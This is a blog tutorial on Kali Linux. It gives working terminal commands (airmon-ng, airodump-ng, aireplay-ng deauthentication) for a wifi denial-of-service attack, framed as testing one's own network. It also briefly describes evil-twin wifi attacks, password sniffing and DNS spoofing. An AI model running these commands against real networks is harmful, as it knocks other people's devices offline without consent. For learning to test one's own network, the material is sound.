How to DOS (Denial of Service) Attack Your Own Wifi with Kali Linux 2

Note: If you do not have Kali Linux, you can buy a pre-made ready to boot USB with Kali Linux on it from our shop from Amazon.

We are a participant in the Amazon Services LLC Associates Program, an affiliate advertising program designed to provide a means for us to earn fees by linking to Amazon.com and affiliated sites

Kali Linux is an OS used for cyber security; the OS comes with a variety of tools, known as penetration testing tools, which are very capable of testing networks and systems. Some capabilities are: sniffing for passwords on a wifi network, wifi password cracking, DNS spoofing, and creating trojan viruses.

The Types of Penetration/Attacks that can be performed with Kali Linux

There is a large variety of tools that come with Kali Linux. Here are some notable ones.

Sniffing for Passwords

Have you ever used a public wifi network, such as Starbucks’ wifi? If so, it is possible that someone has used the public network to ‘sniff’ the usernames and passwords you type when logging into websites. As a note: Internet Explorer is the most vulnerable browser to penetration testing. We recommend that you do not use Internet Explorer.

Wifi Password Cracking

In Kali Linux, you are able to crack into wifi without knowing the network password. This technique requires an auxiliary wifi device for cracking the password.

There are packets of information being communicated between the network and the client. The packets are cracked by the auxiliary device, which stores millions of the most likely passwords used.

Another technique within wifi password cracking is to set up a fake wifi network with the same name as the target network, and shut down the target network.

The user will connect to the fake wifi network, allowing a cyber security specialist to set up whatever website for the target user to enter requested information, such as the wifi password.

DNS Spoofing

When you are connected to a wifi network, you can redirect traffic to a site of your choosing from a target website in order to collect information. An example of a redirect site is a fake router administration page, which would request information entry.

Creating a Trojan Virus

If you use a computer, you have almost certainly heard of a trojan before. A trojan virus is named as a reference to the widely-known Trojan Horse of the Ancient Mediterranean.

Click here to learn how to create a trojan virus in Kali Linux.

This naming is due to the nature of the trojan virus, which is a downloaded virus, often hidden within other files. Most computer viruses are trojans, and Kali Linux allows cyber security specialists to make trojans.

How to DOS (Denial of Service) Attack your Wifi

Requirements:

1. Install Kali

First you need to have Kali installed on a system. This can be done using a virtual machine, but it is recommended that you install this either side by side with your Windows installation or independently on a laptop. This will mitigate errors that you might have detecting third party wifi adapters.

2. Update your Kali

Once you have Kali installed, you will want to update it. To do this, first allow access to all of the Kali repositories.

– Open up terminal in Kali

 sudo nano /etc/apt/sources.list 

– Remove the ‘#’ sign in front of “#deb-src http://http.kali.org/kali kali-rolling main non-free contrib”

– Hit Ctrl-X to exit this window, and hit ‘y’ to save

Now you can type in:

sudo apt-get update
sudo apt-get upgrade

Your system will begin to update. This may take a while so sit back, relax, and watch some Netflix.

3. Install the Wifi Drivers for the Wifi USB device that I recommended earlier

Type in:

sudo apt-get install firmware-atheros


Find the name of your wifi card

iwconfig

4. Put your wifi Card into Monitor Mode

– Put your wifi card into monitor mode.

airmon-ng start wlan0


You might receive a message telling you that certain processes need to be killed so that you can enter monitor mode. Clear this message by typing in:

airmon-ng check kill

5. Search for wifi Access Points and their ‘BSSID’ addresses

You need to find the ‘BSSID’ address of the wifi access point that you will be attacking. You can do this with this command:

airodump-ng wlan0

6. Begin the ‘Attack’

Once you have your wifi’s ‘BSSID’ address, you simply plug it into this command and the attack will begin. (Without the brackets)

aireplay-ng -0 100000 -a [The BSSID of your wifi netowrk] [Name of wifi device]

If you receive a message that your wifi device is not on the same channel as your router, then type in this command.

sudo iwconfig wlan0 channel 8

Your terminal window will now become flooded with a bunch of de-authorization packets. You should see your wifi devices disconnect from the wifi shortly after this and all wifi devices will be unable to connect.

Conclusion

Kali Linux is a very powerful OS in the hands of a capable cyber security specialist, and can be used to test a network for all types of cyber threats.

PS: If you found this article helpful, please subscribe to our mailing list to be notified of when we publish more articles on the functions Kali Linux.

We are a participant in the Amazon Services LLC Associates Program, an affiliate advertising program designed to provide a means for us to earn fees by linking to Amazon.com and affiliated sites.

2 Comments

  1. Like!! I blog quite often and I genuinely thank you for your information. The article has truly peaked my interest.

  2. https://waterfallmagazine.com
    We are a bunch of volunteers and opening a new scheme in our community.
    Your site provided us with useful info to work on. You
    have performed an impressive task and our whole group will be thankful to you.

Leave a Reply

Your email address will not be published. Required fields are marked *